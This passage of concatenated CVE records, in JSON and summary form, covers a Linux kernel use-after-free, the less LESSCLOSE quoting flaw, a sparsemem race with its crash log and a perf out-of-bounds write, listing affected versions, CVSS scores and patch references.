"cpe:/a:redhat:enterprise_linux:8::realtime", "cpe:/a:redhat:enterprise_linux:8::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-553.rt7.342.el8_10", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8::baseos", "cpe:/a:redhat:enterprise_linux:8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-553.el8_10", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhev_hypervisor:4.4::el8", "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhel_eus:8.6::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.6 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.87.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.8::baseos", "cpe:/a:redhat:rhel_eus:8.8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.8 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-477.43.1.el8_8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:9.0::baseos", "cpe:/a:redhat:rhel_eus:9.0::appstream", "cpe:/a:redhat:rhel_eus:9.0::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9.0 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-70.85.1.el9_0", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.0::nfv", "cpe:/a:redhat:rhel_eus:9.0::realtime" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9.0 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-70.85.1.rt21.156.el9_0", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::crb", "cpe:/a:redhat:rhel_eus:9.2::appstream", "cpe:/o:redhat:rhel_eus:9.2::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.48.1.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::nfv", "cpe:/a:redhat:rhel_eus:9.2::realtime" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.48.1.rt14.333.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhev_hypervisor:4.4::el8", "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhel_eus:8.6::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Virtualization 4 for Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.87.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "datePublic": "2023-01-14T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A use-after-free flaw was found in vcs_read in drivers/tty/vt/vc_screen.c in vc_screen in the Linux Kernel. This issue may allow an attacker with local user access to cause a system crash or leak internal kernel information." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-15T16:28:37.229Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:0412", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0412" }, { "name": "RHSA-2024:0431", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0431" }, { "name": "RHSA-2024:0432", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0432" }, { "name": "RHSA-2024:0439", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0439" }, { "name": "RHSA-2024:0448", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0448" }, { "name": "RHSA-2024:0575", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0575" }, { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "name": "RHSA-2024:2950", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2950" }, { "name": "RHSA-2024:3138", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:3138" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-3567" }, { "name": "RHBZ#2221463", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2221463" }, { "url": "https://www.spinics.net/lists/stable-commits/msg285184.html" } ], "timeline": [ { "lang": "en", "time": "2023-04-13T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-01-14T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: use after free in vcs_read in drivers/tty/vt/vc_screen.c due to race", "workarounds": [ { "lang": "en", "value": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability." } ], "x_redhatCweChain": "CWE-416: Use After Free" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-3567", "datePublished": "2023-07-24T15:19:19.795Z", "dateReserved": "2023-07-09T09:05:56.937Z", "dateUpdated": "2024-11-15T16:28:37.229Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-48624
Vulnerability from cvelistv5
Published
2024-02-19 00:00
Modified
2024-08-03 15:17
Severity ?
EPSS score ?
Summary
close_altfile in filename.c in less before 606 omits shell_quote calls for LESSCLOSE.
References
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2022-48624", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-02-20T17:06:03.635874Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-07-05T17:21:42.553Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-03T15:17:55.391Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://github.com/gwsw/less/commit/c6ac6de49698be84d264a0c4c0c40bb870b10144" }, { "tags": [ "x_transferred" ], "url": "https://greenwoodsoftware.com/less/" }, { "tags": [ "x_transferred" ], "url": "https://github.com/gwsw/less/compare/v605...v606" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240605-0010/" }, { "name": "[debian-lts-announce] 20240527 [SECURITY] [DLA 3823-1] less security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/05/msg00018.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "close_altfile in filename.c in less before 606 omits shell_quote calls for LESSCLOSE." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-06-10T17:11:50.319560", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://github.com/gwsw/less/commit/c6ac6de49698be84d264a0c4c0c40bb870b10144" }, { "url": "https://greenwoodsoftware.com/less/" }, { "url": "https://github.com/gwsw/less/compare/v605...v606" }, { "url": "https://security.netapp.com/advisory/ntap-20240605-0010/" }, { "name": "[debian-lts-announce] 20240527 [SECURITY] [DLA 3823-1] less security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2024/05/msg00018.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-48624", "datePublished": "2024-02-19T00:00:00", "dateReserved": "2024-02-19T00:00:00", "dateUpdated": "2024-08-03T15:17:55.391Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-52489
Vulnerability from cvelistv5
Published
2024-02-29 15:52
Modified
2024-12-19 08:20
Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
mm/sparsemem: fix race in accessing memory_section->usage
The below race is observed on a PFN which falls into the device memory
region with the system memory configuration where PFN's are such that
[ZONE_NORMAL ZONE_DEVICE ZONE_NORMAL]. Since normal zone start and end
pfn contains the device memory PFN's as well, the compaction triggered
will try on the device memory PFN's too though they end up in NOP(because
pfn_to_online_page() returns NULL for ZONE_DEVICE memory sections). When
from other core, the section mappings are being removed for the
ZONE_DEVICE region, that the PFN in question belongs to, on which
compaction is currently being operated is resulting into the kernel crash
with CONFIG_SPASEMEM_VMEMAP enabled. The crash logs can be seen at [1].
compact_zone() memunmap_pages
------------- ---------------
__pageblock_pfn_to_page
......
(a)pfn_valid():
valid_section()//return true
(b)__remove_pages()->
sparse_remove_section()->
section_deactivate():
[Free the array ms->usage and set
ms->usage = NULL]
pfn_section_valid()
[Access ms->usage which
is NULL]
NOTE: From the above it can be said that the race is reduced to between
the pfn_valid()/pfn_section_valid() and the section deactivate with
SPASEMEM_VMEMAP enabled.
The commit b943f045a9af("mm/sparse: fix kernel crash with
pfn_section_valid check") tried to address the same problem by clearing
the SECTION_HAS_MEM_MAP with the expectation of valid_section() returns
false thus ms->usage is not accessed.
Fix this issue by the below steps:
a) Clear SECTION_HAS_MEM_MAP before freeing the ->usage.
b) RCU protected read side critical section will either return NULL
when SECTION_HAS_MEM_MAP is cleared or can successfully access ->usage.
c) Free the ->usage with kfree_rcu() and set ms->usage = NULL. No
attempt will be made to access ->usage after this as the
SECTION_HAS_MEM_MAP is cleared thus valid_section() return false.
Thanks to David/Pavan for their inputs on this patch.
[1] https://lore.kernel.org/linux-mm/994410bb-89aa-d987-1f50-f514903c55aa@quicinc.com/
On Snapdragon SoC, with the mentioned memory configuration of PFN's as
[ZONE_NORMAL ZONE_DEVICE ZONE_NORMAL], we are able to see bunch of
issues daily while testing on a device farm.
For this particular issue below is the log. Though the below log is
not directly pointing to the pfn_section_valid(){ ms->usage;}, when we
loaded this dump on T32 lauterbach tool, it is pointing.
[ 540.578056] Unable to handle kernel NULL pointer dereference at
virtual address 0000000000000000
[ 540.578068] Mem abort info:
[ 540.578070] ESR = 0x0000000096000005
[ 540.578073] EC = 0x25: DABT (current EL), IL = 32 bits
[ 540.578077] SET = 0, FnV = 0
[ 540.578080] EA = 0, S1PTW = 0
[ 540.578082] FSC = 0x05: level 1 translation fault
[ 540.578085] Data abort info:
[ 540.578086] ISV = 0, ISS = 0x00000005
[ 540.578088] CM = 0, WnR = 0
[ 540.579431] pstate: 82400005 (Nzcv daif +PAN -UAO +TCO -DIT -SSBSBTYPE=--)
[ 540.579436] pc : __pageblock_pfn_to_page+0x6c/0x14c
[ 540.579454] lr : compact_zone+0x994/0x1058
[ 540.579460] sp : ffffffc03579b510
[ 540.579463] x29: ffffffc03579b510 x28: 0000000000235800 x27:000000000000000c
[ 540.579470] x26: 0000000000235c00 x25: 0000000000000068 x24:ffffffc03579b640
[ 540.579477] x23: 0000000000000001 x22: ffffffc03579b660 x21:0000000000000000
[ 540.579483] x20: 0000000000235bff x19: ffffffdebf7e3940 x18:ffffffdebf66d140
[ 540.579489] x17: 00000000739ba063 x16: 00000000739ba063 x15:00000000009f4bff
[ 540.579495] x14: 0000008000000000 x13: 0000000000000000 x12:0000000000000001
[ 540.579501] x11: 0000000000000000 x10: 0000000000000000 x9 :ffffff897d2cd440
[ 540.579507] x8 : 0000000000000000 x7 : 0000000000000000 x6 :ffffffc03579b5b4
[ 540.579512] x5 : 0000000000027f25 x4 : ffffffc03579b5b8 x3 :0000000000000
---truncated---
References
Impacted products
Vendor | Product | Version | |||||
---|---|---|---|---|---|---|---|
▼ | Linux | Linux |
Version: f46edbd1b1516da1fb34c917775168d5df576f78 Version: f46edbd1b1516da1fb34c917775168d5df576f78 Version: f46edbd1b1516da1fb34c917775168d5df576f78 Version: f46edbd1b1516da1fb34c917775168d5df576f78 Version: f46edbd1b1516da1fb34c917775168d5df576f78 Version: f46edbd1b1516da1fb34c917775168d5df576f78 |
||||
|
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2023-52489", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-03-12T14:56:15.828991Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-06-04T17:22:46.560Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T23:03:20.387Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/90ad17575d26874287271127d43ef3c2af876cea" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/b448de2459b6d62a53892487ab18b7d823ff0529" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/68ed9e33324021e9d6b798e9db00ca3093d2012a" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/70064241f2229f7ba7b9599a98f68d9142e81a97" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/3a01daace71b521563c38bbbf874e14c3e58adb7" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/5ec8e8ea8b7783fab150cf86404fc38cb4db8800" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Linux", "programFiles": [ "include/linux/mmzone.h", "mm/sparse.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "lessThan": "90ad17575d26874287271127d43ef3c2af876cea", "status": "affected", "version": "f46edbd1b1516da1fb34c917775168d5df576f78", "versionType": "git" }, { "lessThan": "b448de2459b6d62a53892487ab18b7d823ff0529", "status": "affected", "version": "f46edbd1b1516da1fb34c917775168d5df576f78", "versionType": "git" }, { "lessThan": "68ed9e33324021e9d6b798e9db00ca3093d2012a", "status": "affected", "version": "f46edbd1b1516da1fb34c917775168d5df576f78", "versionType": "git" }, { "lessThan": "70064241f2229f7ba7b9599a98f68d9142e81a97", "status": "affected", "version": "f46edbd1b1516da1fb34c917775168d5df576f78", "versionType": "git" }, { "lessThan": "3a01daace71b521563c38bbbf874e14c3e58adb7", "status": "affected", "version": "f46edbd1b1516da1fb34c917775168d5df576f78", "versionType": "git" }, { "lessThan": "5ec8e8ea8b7783fab150cf86404fc38cb4db8800", "status": "affected", "version": "f46edbd1b1516da1fb34c917775168d5df576f78", "versionType": "git" } ] }, { "defaultStatus": "affected", "product": "Linux", "programFiles": [ "include/linux/mmzone.h", "mm/sparse.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "status": "affected", "version": "5.3" }, { "lessThan": "5.3", "status": "unaffected", "version": "0", "versionType": "semver" }, { "lessThanOrEqual": "5.10.*", "status": "unaffected", "version": "5.10.210", "versionType": "semver" }, { "lessThanOrEqual": "5.15.*", "status": "unaffected", "version": "5.15.149", "versionType": "semver" }, { "lessThanOrEqual": "6.1.*", "status": "unaffected", "version": "6.1.76", "versionType": "semver" }, { "lessThanOrEqual": "6.6.*", "status": "unaffected", "version": "6.6.15", "versionType": "semver" }, { "lessThanOrEqual": "6.7.*", "status": "unaffected", "version": "6.7.3", "versionType": "semver" }, { "lessThanOrEqual": "*", "status": "unaffected", "version": "6.8", "versionType": "original_commit_for_fix" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm/sparsemem: fix race in accessing memory_section-\u003eusage\n\nThe below race is observed on a PFN which falls into the device memory\nregion with the system memory configuration where PFN\u0027s are such that\n[ZONE_NORMAL ZONE_DEVICE ZONE_NORMAL]. Since normal zone start and end\npfn contains the device memory PFN\u0027s as well, the compaction triggered\nwill try on the device memory PFN\u0027s too though they end up in NOP(because\npfn_to_online_page() returns NULL for ZONE_DEVICE memory sections). When\nfrom other core, the section mappings are being removed for the\nZONE_DEVICE region, that the PFN in question belongs to, on which\ncompaction is currently being operated is resulting into the kernel crash\nwith CONFIG_SPASEMEM_VMEMAP enabled. The crash logs can be seen at [1].\n\ncompact_zone()\t\t\tmemunmap_pages\n-------------\t\t\t---------------\n__pageblock_pfn_to_page\n ......\n (a)pfn_valid():\n valid_section()//return true\n\t\t\t (b)__remove_pages()-\u003e\n\t\t\t\t sparse_remove_section()-\u003e\n\t\t\t\t section_deactivate():\n\t\t\t\t [Free the array ms-\u003eusage and set\n\t\t\t\t ms-\u003eusage = NULL]\n pfn_section_valid()\n [Access ms-\u003eusage which\n is NULL]\n\nNOTE: From the above it can be said that the race is reduced to between\nthe pfn_valid()/pfn_section_valid() and the section deactivate with\nSPASEMEM_VMEMAP enabled.\n\nThe commit b943f045a9af(\"mm/sparse: fix kernel crash with\npfn_section_valid check\") tried to address the same problem by clearing\nthe SECTION_HAS_MEM_MAP with the expectation of valid_section() returns\nfalse thus ms-\u003eusage is not accessed.\n\nFix this issue by the below steps:\n\na) Clear SECTION_HAS_MEM_MAP before freeing the -\u003eusage.\n\nb) RCU protected read side critical section will either return NULL\n when SECTION_HAS_MEM_MAP is cleared or can successfully access -\u003eusage.\n\nc) Free the -\u003eusage with kfree_rcu() and set ms-\u003eusage = NULL. No\n attempt will be made to access -\u003eusage after this as the\n SECTION_HAS_MEM_MAP is cleared thus valid_section() return false.\n\nThanks to David/Pavan for their inputs on this patch.\n\n[1] https://lore.kernel.org/linux-mm/994410bb-89aa-d987-1f50-f514903c55aa@quicinc.com/\n\nOn Snapdragon SoC, with the mentioned memory configuration of PFN\u0027s as\n[ZONE_NORMAL ZONE_DEVICE ZONE_NORMAL], we are able to see bunch of\nissues daily while testing on a device farm.\n\nFor this particular issue below is the log. Though the below log is\nnot directly pointing to the pfn_section_valid(){ ms-\u003eusage;}, when we\nloaded this dump on T32 lauterbach tool, it is pointing.\n\n[ 540.578056] Unable to handle kernel NULL pointer dereference at\nvirtual address 0000000000000000\n[ 540.578068] Mem abort info:\n[ 540.578070] ESR = 0x0000000096000005\n[ 540.578073] EC = 0x25: DABT (current EL), IL = 32 bits\n[ 540.578077] SET = 0, FnV = 0\n[ 540.578080] EA = 0, S1PTW = 0\n[ 540.578082] FSC = 0x05: level 1 translation fault\n[ 540.578085] Data abort info:\n[ 540.578086] ISV = 0, ISS = 0x00000005\n[ 540.578088] CM = 0, WnR = 0\n[ 540.579431] pstate: 82400005 (Nzcv daif +PAN -UAO +TCO -DIT -SSBSBTYPE=--)\n[ 540.579436] pc : __pageblock_pfn_to_page+0x6c/0x14c\n[ 540.579454] lr : compact_zone+0x994/0x1058\n[ 540.579460] sp : ffffffc03579b510\n[ 540.579463] x29: ffffffc03579b510 x28: 0000000000235800 x27:000000000000000c\n[ 540.579470] x26: 0000000000235c00 x25: 0000000000000068 x24:ffffffc03579b640\n[ 540.579477] x23: 0000000000000001 x22: ffffffc03579b660 x21:0000000000000000\n[ 540.579483] x20: 0000000000235bff x19: ffffffdebf7e3940 x18:ffffffdebf66d140\n[ 540.579489] x17: 00000000739ba063 x16: 00000000739ba063 x15:00000000009f4bff\n[ 540.579495] x14: 0000008000000000 x13: 0000000000000000 x12:0000000000000001\n[ 540.579501] x11: 0000000000000000 x10: 0000000000000000 x9 :ffffff897d2cd440\n[ 540.579507] x8 : 0000000000000000 x7 : 0000000000000000 x6 :ffffffc03579b5b4\n[ 540.579512] x5 : 0000000000027f25 x4 : ffffffc03579b5b8 x3 :0000000000000\n---truncated---" } ], "providerMetadata": { "dateUpdated": "2024-12-19T08:20:47.821Z", "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "shortName": "Linux" }, "references": [ { "url": "https://git.kernel.org/stable/c/90ad17575d26874287271127d43ef3c2af876cea" }, { "url": "https://git.kernel.org/stable/c/b448de2459b6d62a53892487ab18b7d823ff0529" }, { "url": "https://git.kernel.org/stable/c/68ed9e33324021e9d6b798e9db00ca3093d2012a" }, { "url": "https://git.kernel.org/stable/c/70064241f2229f7ba7b9599a98f68d9142e81a97" }, { "url": "https://git.kernel.org/stable/c/3a01daace71b521563c38bbbf874e14c3e58adb7" }, { "url": "https://git.kernel.org/stable/c/5ec8e8ea8b7783fab150cf86404fc38cb4db8800" } ], "title": "mm/sparsemem: fix race in accessing memory_section-\u003eusage", "x_generator": { "engine": "bippy-5f407fcff5a0" } } }, "cveMetadata": { "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "assignerShortName": "Linux", "cveId": "CVE-2023-52489", "datePublished": "2024-02-29T15:52:08.718Z", "dateReserved": "2024-02-20T12:30:33.302Z", "dateUpdated": "2024-12-19T08:20:47.821Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-6931
Vulnerability from cvelistv5
Published
2023-12-19 14:09
Modified
2024-08-02 08:42
Severity ?
EPSS score ?
Summary
A heap out-of-bounds write vulnerability in the Linux kernel's Performance Events system component can be exploited to achieve local privilege escalation.
A perf_event's read_size can overflow, leading to an heap out-of-bounds increment or write in perf_read_group().
We recommend upgrading past commit 382c27f4ed28f803b1f1473ac2d8db0afc795a1b.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T08:42:08.665Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "patch", "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=382c27f4ed28f803b1f1473ac2d8db0afc795a1b" }, { "tags": [ "x_transferred" ], "url": "https://kernel.dance/382c27f4ed28f803b1f1473ac2d8db0afc795a1b" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "packageName": "kernel", "product": "Kernel", "repo": "https://git.kernel.org", "vendor": "Linux", "versions": [ { "lessThan": "6.7", "status": "affected", "version": "4.3", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "type": "finder", "user": "00000000-0000-4000-9000-000000000000", "value": "Budimir Markovic" } ], "datePublic": "2023-11-29T14:43:50+00:00", "descriptions": [ { "lang": "en", "value": "A heap out-of-bounds write vulnerability in the Linux kernel\u0027s Performance Events system component can be exploited to achieve local privilege escalation.\n\nA perf_event\u0027s read_size can overflow, leading to an heap out-of-bounds increment or write in perf_read_group().\n\nWe recommend upgrading past commit 382c27f4ed28f803b1f1473ac2d8db0afc795a1b.\n\n" } ], "impacts": [ { "capecId": "CAPEC-233", "descriptions": [ { "lang": "en", "value": "CAPEC-233 Privilege Escalation" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-787", "description": "CWE-787 Out-of-bounds Write", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-12-19T14:09:14.085Z", "orgId": "14ed7db2-1595-443d-9d34-6215bf890778", "shortName": "Google" }, "references": [ { "tags": [ "patch" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=382c27f4ed28f803b1f1473ac2d8db0afc795a1b" }, { "url": "https://kernel.dance/382c27f4ed28f803b1f1473ac2d8db0afc795a1b" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html" } ], "source": { "discovery": "EXTERNAL" }, "title": "Out-of-bounds write in Linux kernel\u0027s Performance Events system component", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778", "assignerShortName": "Google", "cveId": "CVE-2023-6931", "datePublished": "2023-12-19T14:09:14.085Z", "dateReserved": "2023-12-18T20:13:06.510Z", "dateUpdated": "2024-08-02T08:42:08.665Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-6129
Vulnerability from cvelistv5
Published
2024-01-09 16:36
Modified
